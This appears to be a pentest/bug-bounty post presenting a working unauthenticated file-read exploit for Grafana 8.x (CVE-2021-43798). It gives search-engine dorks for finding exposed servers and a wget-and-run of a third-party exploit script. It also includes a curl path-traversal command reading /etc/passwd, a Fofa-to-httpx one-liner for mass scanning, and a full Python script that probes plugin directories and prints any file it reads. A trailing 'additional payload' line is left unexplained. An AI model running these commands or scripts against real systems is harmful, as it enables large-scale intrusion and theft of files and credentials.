Grafana - Unauthenticated Arbitrary File Read (path traversal). At the time of writing this was an unpatched 0-day under active exploitation; it affects only Grafana 8.x (8.0.0-beta1 through 8.3.0). It has since been assigned CVE-2021-43798 and fixed in 8.3.1, with backports to 8.0.7, 8.1.8 and 8.2.7. The bug is a directory traversal in the plugin asset route /public/plugins/<plugin-id>/, not an include: any file readable by the Grafana process can be fetched without logging in, as long as <plugin-id> is a plugin that actually exists on the target (the bundled panels such as welcome or graph do on a default install).

Dorks:

Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC:

wget https://raw.githubusercontent.com/Gabriel-Lima232/Grafana-LFI-8.x/main/grafana-exploit.py; chmod +x grafana-exploit.py;

python3 grafana-exploit.py http://10.180.47.42:3000 /etc/passwd

OR

curl http://10.180.47.42:3000/public/plugins/welcome/../../../../../../../../../../etc/passwd --path-as-is

--path-as-is is required: without it curl collapses the ../ segments client-side and the server only ever sees /public/plugins/welcome/etc/passwd, which 404s. The same applies to any HTTP library that normalises dot segments before sending.

One line command to detect:

echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd" -mc 200 -ms 'root:x:0:0'

Matching on the root:x:0:0 string (-ms) as well as the status code (-mc 200) is what makes this reliable: a 200 alone is not proof of a file read.
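The PoC script and the one-liner above are fine for a quick hit, but a check you can drop into a scan should send the traversal path verbatim and judge the response by content, not by status. The following is an added example, not the grafana-exploit.py referenced above nor Grafana project code: it reads the version from the unauthenticated /api/health endpoint, tries the traversal against a few bundled plugin directories, and only reports a hit when the body is really the requested file. The host/port, the alertlist and text plugin ids, and the traversal depth are assumptions for illustration.

```python
#!/usr/bin/env python3
# Added example, not the original post's grafana-exploit.py. It probes the
# Grafana 8.x plugin-asset traversal with a raw request path and judges the
# response by content. Host, port and extra plugin ids are assumptions.
import http.client
import json
import re
import sys

# Plugin directories present on a default Grafana 8 install. "welcome" and
# "graph" are the ids used in the PoC; alertlist and text are assumed here.
BUNDLED_PLUGINS = ("welcome", "graph", "alertlist", "text")

# A genuine /etc/passwd starts with root's entry; matching on this rather than
# on "200 OK" alone avoids false positives from pages served with status 200.
PASSWD_ROOT = re.compile(r"^root:x:0:0:", re.MULTILINE)

# Vulnerable range 8.0.0-beta1 .. 8.3.0; 8.3.1 and these backports carry the fix.
FIXED_BACKPORTS = {(8, 0, 7), (8, 1, 8), (8, 2, 7)}


def traversal_path(target: str, plugin: str = "welcome", depth: int = 10) -> str:
    """Build /public/plugins/<plugin>/ followed by `depth` '../' segments and the target."""
    return f"/public/plugins/{plugin}/" + "../" * depth + target.lstrip("/")


def parse_version(text: str):
    """'8.3.0' or '8.0.0-beta1' -> (8, 3, 0) / (8, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text or "")
    return tuple(int(x) for x in m.groups()) if m else None


def version_affected(text: str) -> bool:
    """True when the reported version lies in the vulnerable 8.x range."""
    v = parse_version(text)
    return v is not None and (8, 0, 0) <= v <= (8, 3, 0) and v not in FIXED_BACKPORTS


def health_version(body: str):
    """Pull 'version' out of the unauthenticated /api/health JSON, or None."""
    try:
        return json.loads(body).get("version")
    except (ValueError, AttributeError):
        return None


def looks_vulnerable(status: int, body: str, target: str = "/etc/passwd") -> bool:
    """A read succeeded only if the body is plausibly the requested file."""
    if status != 200 or not body:
        return False
    if target.endswith("passwd"):
        return PASSWD_ROOT.search(body) is not None
    return True


def fetch_raw(host: str, port: int, path: str, timeout: float = 5.0):
    """GET with the path sent verbatim. http.client does not strip '..'
    segments; requests/urllib3 normalise them away before sending, which
    turns this probe into /public/plugins/<plugin>/etc/passwd (a false negative)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, body


def main(argv):
    if len(argv) != 3:
        print(f"usage: {argv[0]} host[:port] /path/to/file", file=sys.stderr)
        return 2
    host, _, port = argv[1].partition(":")
    port = int(port or 3000)
    target = argv[2]
    _, body = fetch_raw(host, port, "/api/health")
    ver = health_version(body) or "unknown"
    print(f"[*] {host}:{port} reports Grafana {ver}; in affected range: {version_affected(ver)}")
    for plugin in BUNDLED_PLUGINS:
        status, body = fetch_raw(host, port, traversal_path(target, plugin))
        if looks_vulnerable(status, body, target):
            print(f"[+] {target} read via plugin '{plugin}':\n{body}")
            return 0
        print(f"[-] plugin '{plugin}': HTTP {status}")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 grafana_check.py 10.180.47.42:3000 /etc/passwd`. Ten traversal segments is more than enough to climb out of any plugin directory under /usr/share/grafana; extra `..` at the filesystem root are harmless. Version checking is advisory only: the /api/health value can be hidden behind a proxy, so the traversal probe, not the version string, is the deciding test.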

#grafana #lfi #bugbounty #pentest



Additional payload: /dashboard/snapshot/*?orgId=0%20/invite/: